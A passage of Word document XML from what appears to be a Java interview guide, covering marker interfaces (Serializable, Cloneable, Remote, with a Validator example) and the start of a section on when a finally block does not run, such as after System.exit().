          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25799DD3"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A86E29"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Validator</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> validator </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Validator</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996F1CF"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        validator</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>validate</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Output: This object is validatable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC78703" w14:textId="7777777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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA6AB5D" w14:textId="51F90C57" w:rsidR="004B1ADF" w:rsidRPr="004B1ADF" w:rsidRDefault="004B1A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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33474C06" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">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In the above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513C617D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:num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The Validatable interface is a marker interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474D40D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:num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The Validator class checks if the object implements the Validatable interface using instanceof.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7AFD1" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:num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The program can handle the User object differently based on whether it implements the marker interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920CE81" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Examples of Marker Interfaces in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9EDBB8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Marks a class as being serializable (i.e., its state can be saved to a stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5FE5CD" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cloneable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Marks a class as being cloneable (i.e., it allows for creating a copy of an object via Object.clone()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFE003" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Marks a class as a remote object in the RMI (Remote Method Invocation) system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B419434" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Benefits of Using Marker Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDF62CF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Separation of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Marker interfaces allow you to separate concerns in the program. For instance, classes that require serialization can implement the Serializable interface without having to be concerned about serialization logic themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE89D2" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Increased flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: The marker interface pattern allows for flexibility and extension without changing existing code. New marker interfaces can be introduced to give classes special abilities or properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5A2969" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Type-safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Using instanceof with a marker interface provides a safe way to check for specific capabilities, avoiding potential errors or casting issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F37F2D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2662DFFA" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>marker interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is an empty interface used to convey metadata or information about a class. The class that implements this interface can be treated in a special way, usually by using reflection or checking with instanceof. Its primary use is to indicate that an object has a certain property or behavior without actually enforcing any methods or logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F409D16" w14:textId="7BF9AD47"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8FBB91F">
          <v:rect id="_x0000_i1172" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEEE259" w14:textId="77ACB1A6" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00112FB2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc196307528"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How can we ignore the finally block</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="032179AD" w14:textId="0CCB59D0" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014AAA">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Java, the finally block is always executed after the try block, regardless of whether an exception is thrown or not. However, there are a few scenarios where the finally block might seem "ignored" or not executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36459B3E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014AA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If System.exit() is called in the try or catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761789D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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ystem.exit() method terminates the JVM immediately, and any code after that (including the finally block) will not be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CD668" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00014A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1060C79C" w14:textId="77777777"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1973936"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FinallyExample</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
